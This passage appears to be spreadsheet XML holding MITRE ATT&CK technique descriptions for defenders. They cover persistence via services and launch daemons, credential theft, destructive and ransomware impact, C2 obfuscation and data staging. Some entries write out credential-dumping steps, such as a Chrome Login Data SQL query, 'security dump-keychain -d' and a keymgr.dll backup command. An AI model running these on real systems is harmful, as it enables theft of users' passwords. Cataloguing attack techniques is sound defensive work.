    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)  </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
 Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) </t>
  </si>
  <si>
    <t>Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 
Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. 
Keychains can be viewed and edited through the Keychain Access application or using the command-line utility &lt;code&gt;security&lt;/code&gt;. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)
Adversaries may gather user credentials from Keychain storage/memory. For example, the command &lt;code&gt;security dump-keychain –d&lt;/code&gt; will dump all Login Keychain credentials from &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Adversaries may also directly read Login Keychain credentials from the &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt; file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  </t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as &lt;code&gt;CredEnumerateA&lt;/code&gt;, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running &lt;code&gt;rundll32.exe keymgr.dll KRShowKeyMgr&lt;/code&gt; then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) </t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Adversaries may access data from improperly secured cloud storage.
Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. 
In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011)
Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.
This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)
Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.</t>
  </si>
  <si>
    <t>Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. 
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.</t>
  </si>
  <si>
    <t>Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
